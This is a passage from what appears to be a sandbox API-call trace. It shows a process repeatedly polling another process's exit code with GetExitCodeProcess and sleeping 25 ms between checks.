(dwMilliseconds=0x19) [0293.300] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0293.300] Sleep (dwMilliseconds=0x19) [0293.327] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0293.327] Sleep (dwMilliseconds=0x19) [0293.416] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0293.416] Sleep (dwMilliseconds=0x19) [0293.445] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0293.445] Sleep (dwMilliseconds=0x19) [0293.472] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0293.472] Sleep (dwMilliseconds=0x19) [0293.500] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0293.500] Sleep (dwMilliseconds=0x19) [0293.530] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0293.530] Sleep (dwMilliseconds=0x19) [0293.561] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0293.561] Sleep (dwMilliseconds=0x19) [0293.591] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0293.591] Sleep (dwMilliseconds=0x19) [0293.624] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0293.624] Sleep (dwMilliseconds=0x19) [0293.656] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0293.656] Sleep (dwMilliseconds=0x19) [0293.682] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0293.682] Sleep (dwMilliseconds=0x19) [0293.715] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0293.715] Sleep (dwMilliseconds=0x19) [0293.743] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0293.745] Sleep (dwMilliseconds=0x19) [0293.774] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0293.774] Sleep (dwMilliseconds=0x19) [0293.800] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0293.800] Sleep (dwMilliseconds=0x19) [0293.827] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0293.827] Sleep (dwMilliseconds=0x19) [0293.859] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0293.859] Sleep (dwMilliseconds=0x19) [0293.885] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0293.885] Sleep (dwMilliseconds=0x19) [0293.932] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0293.933] Sleep (dwMilliseconds=0x19) [0293.959] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0293.959] Sleep (dwMilliseconds=0x19) [0293.991] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0293.991] Sleep (dwMilliseconds=0x19) [0294.024] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0294.024] Sleep (dwMilliseconds=0x19) [0294.056] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0294.057] Sleep (dwMilliseconds=0x19) [0294.091] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0294.091] Sleep (dwMilliseconds=0x19) [0294.122] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0294.122] Sleep (dwMilliseconds=0x19) [0294.159] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0294.159] Sleep (dwMilliseconds=0x19) [0294.196] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0294.196] Sleep (dwMilliseconds=0x19) [0294.226] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0294.227] Sleep (dwMilliseconds=0x19) [0294.254] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0294.254] Sleep (dwMilliseconds=0x19) [0294.282] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0294.282] Sleep (dwMilliseconds=0x19) [0294.339] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0294.339] Sleep (dwMilliseconds=0x19) [0294.402] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0294.402] Sleep (dwMilliseconds=0x19) [0294.468] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0294.468] Sleep (dwMilliseconds=0x19) [0294.528] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0294.528] Sleep (dwMilliseconds=0x19) [0294.573] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0294.573] Sleep (dwMilliseconds=0x19) [0294.608] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0294.608] Sleep (dwMilliseconds=0x19) [0294.676] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0294.676] Sleep (dwMilliseconds=0x19) [0294.710] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0294.710] Sleep (dwMilliseconds=0x19) [0294.741] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0294.741] Sleep (dwMilliseconds=0x19) [0294.791] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0294.791] Sleep (dwMilliseconds=0x19) [0294.818] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0294.818] Sleep (dwMilliseconds=0x19) [0294.861] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0294.861] Sleep (dwMilliseconds=0x19) [0294.908] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0294.909] Sleep (dwMilliseconds=0x19) [0294.937] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0294.937] Sleep (dwMilliseconds=0x19) [0294.974] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0294.974] Sleep (dwMilliseconds=0x19) [0295.010] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0295.010] Sleep (dwMilliseconds=0x19) [0295.092] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0295.092] Sleep (dwMilliseconds=0x19) [0295.137] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0295.137] Sleep (dwMilliseconds=0x19) [0295.175] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0295.175] Sleep (dwMilliseconds=0x19) [0295.210] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0295.210] Sleep (dwMilliseconds=0x19) [0295.301] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0295.301] Sleep (dwMilliseconds=0x19) [0295.417] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0295.417] Sleep (dwMilliseconds=0x19) [0295.467] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0295.467] Sleep (dwMilliseconds=0x19) [0295.496] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0295.496] Sleep (dwMilliseconds=0x19) [0295.524] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0295.524] Sleep (dwMilliseconds=0x19) [0295.571] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0295.571] Sleep (dwMilliseconds=0x19) [0295.600] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0295.600] Sleep (dwMilliseconds=0x19) [0295.636] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0295.636] Sleep (dwMilliseconds=0x19) [0295.691] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0295.691] Sleep (dwMilliseconds=0x19) [0295.766] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0295.767] Sleep (dwMilliseconds=0x19) [0295.902] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0295.902] Sleep (dwMilliseconds=0x19) [0295.980] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0295.980] Sleep (dwMilliseconds=0x19) [0296.046] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0296.047] Sleep (dwMilliseconds=0x19) [0296.081] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0296.081] Sleep (dwMilliseconds=0x19) [0296.107] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0296.107] Sleep (dwMilliseconds=0x19) [0296.178] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0296.178] Sleep (dwMilliseconds=0x19) [0296.215] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0296.215] Sleep (dwMilliseconds=0x19) [0296.256] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0296.257] Sleep (dwMilliseconds=0x19) [0296.292] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0296.292] Sleep (dwMilliseconds=0x19) [0296.319] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0296.319] Sleep (dwMilliseconds=0x19) [0296.347] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0296.347] Sleep (dwMilliseconds=0x19) [0296.378] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0296.378] Sleep (dwMilliseconds=0x19) [0296.532] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0296.532] Sleep (dwMilliseconds=0x19) [0296.617] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0296.617] Sleep (dwMilliseconds=0x19) [0296.656] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0296.656] Sleep (dwMilliseconds=0x19) [0296.705] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0296.705] Sleep (dwMilliseconds=0x19) [0296.732] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0296.732] Sleep (dwMilliseconds=0x19) [0296.810] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0296.810] Sleep (dwMilliseconds=0x19) [0296.848] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0296.848] Sleep (dwMilliseconds=0x19) [0296.886] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0296.886] Sleep (dwMilliseconds=0x19) [0296.916] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0296.916] Sleep (dwMilliseconds=0x19) [0296.951] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0296.952] Sleep (dwMilliseconds=0x19) [0296.981] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0296.981] Sleep (dwMilliseconds=0x19) [0297.016] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0297.017] Sleep (dwMilliseconds=0x19) [0297.059] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0297.059] Sleep (dwMilliseconds=0x19) [0297.154] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0297.154] Sleep (dwMilliseconds=0x19) [0297.192] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0297.192] Sleep (dwMilliseconds=0x19) [0297.235] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0297.235] Sleep (dwMilliseconds=0x19) [0297.282] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0297.282] Sleep (dwMilliseconds=0x19) [0297.323] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0297.323] Sleep (dwMilliseconds=0x19) [0297.361] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0297.361] Sleep (dwMilliseconds=0x19) [0297.406] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0297.406] Sleep (dwMilliseconds=0x19) [0297.433] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0297.433] Sleep (dwMilliseconds=0x19) [0297.516] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0297.516] Sleep (dwMilliseconds=0x19) [0297.555] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0297.555] Sleep (dwMilliseconds=0x19) [0297.596] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0297.597] Sleep (dwMilliseconds=0x19) [0297.628] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0297.628] Sleep (dwMilliseconds=0x19) [0297.683] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0297.683] Sleep (dwMilliseconds=0x19) [0297.716] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0297.716] Sleep (dwMilliseconds=0x19) [0297.743] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0297.744] Sleep (dwMilliseconds=0x19) [0297.774] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0297.774] Sleep (dwMilliseconds=0x19) [0297.843] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0297.843] Sleep (dwMilliseconds=0x19) [0297.873] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0297.873] Sleep (dwMilliseconds=0x19) [0297.969] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0297.969] Sleep (dwMilliseconds=0x19) [0298.040] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0298.040] Sleep (dwMilliseconds=0x19) [0298.077] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0298.077] Sleep (dwMilliseconds=0x19) [0298.112] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0298.112] Sleep (dwMilliseconds=0x19) [0298.163] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0298.163] Sleep (dwMilliseconds=0x19) [0298.196] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0298.196] Sleep (dwMilliseconds=0x19) [0298.240] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0298.240] Sleep (dwMilliseconds=0x19) [0298.270] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0298.270] Sleep (dwMilliseconds=0x19) [0298.297] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0298.297] Sleep (dwMilliseconds=0x19) [0298.324] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0298.324] Sleep (dwMilliseconds=0x19) [0298.360] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0298.360] Sleep (dwMilliseconds=0x19) [0298.397] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0298.397] Sleep (dwMilliseconds=0x19) [0298.468] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0298.468] Sleep (dwMilliseconds=0x19) [0298.597] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0298.597] Sleep (dwMilliseconds=0x19) [0298.632] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0298.633] Sleep (dwMilliseconds=0x19) [0298.679] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0298.679] Sleep (dwMilliseconds=0x19) [0298.711] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0298.711] Sleep (dwMilliseconds=0x19) [0298.754] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0298.754] Sleep (dwMilliseconds=0x19) [0298.788] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0298.788] Sleep (dwMilliseconds=0x19) [0298.823] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0298.823] Sleep (dwMilliseconds=0x19) [0298.885] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0298.885] Sleep (dwMilliseconds=0x19) [0298.914] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0298.914] Sleep (dwMilliseconds=0x19) [0298.952] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0298.952] Sleep (dwMilliseconds=0x19) [0299.045] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0299.045] Sleep (dwMilliseconds=0x19) [0299.116] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0299.116] Sleep (dwMilliseconds=0x19) [0299.177] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0299.177] Sleep (dwMilliseconds=0x19) [0299.206] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0299.206] Sleep (dwMilliseconds=0x19) [0299.246] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0299.246] Sleep (dwMilliseconds=0x19) [0299.273] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0299.273] Sleep (dwMilliseconds=0x19) [0299.312] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0299.313] Sleep (dwMilliseconds=0x19) [0299.348] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0299.348] Sleep (dwMilliseconds=0x19) [0299.433] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0299.433] Sleep (dwMilliseconds=0x19) [0299.469] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0299.469] Sleep (dwMilliseconds=0x19) [0299.569] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0299.569] Sleep (dwMilliseconds=0x19) [0299.634] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0299.634] Sleep (dwMilliseconds=0x19) [0299.666] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0299.666] Sleep (dwMilliseconds=0x19) [0299.707] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0299.707] Sleep (dwMilliseconds=0x19) [0299.735] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0299.735] Sleep (dwMilliseconds=0x19) [0299.765] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0299.765] Sleep (dwMilliseconds=0x19) [0299.792] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0299.792] Sleep (dwMilliseconds=0x19) [0299.818] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0299.818] Sleep (dwMilliseconds=0x19) [0299.870] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0299.870] Sleep (dwMilliseconds=0x19) [0299.906] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0299.906] Sleep (dwMilliseconds=0x19) [0299.985] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0299.986] Sleep (dwMilliseconds=0x19) [0300.102] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0300.102] Sleep (dwMilliseconds=0x19) [0300.160] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0300.160] Sleep (dwMilliseconds=0x19) [0300.793] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0300.793] Sleep (dwMilliseconds=0x19) [0300.829] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0300.829] Sleep (dwMilliseconds=0x19) [0300.855] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0300.855] Sleep (dwMilliseconds=0x19) [0300.902] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0300.902] Sleep (dwMilliseconds=0x19) [0300.935] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0300.935] Sleep (dwMilliseconds=0x19) [0301.003] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0301.003] Sleep (dwMilliseconds=0x19) [0301.059] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0301.059] Sleep (dwMilliseconds=0x19) [0301.154] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0301.155] Sleep (dwMilliseconds=0x19) [0301.191] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0301.191] Sleep (dwMilliseconds=0x19) [0301.241] GetExitCodeProcess (in: hProcess=0x40c, 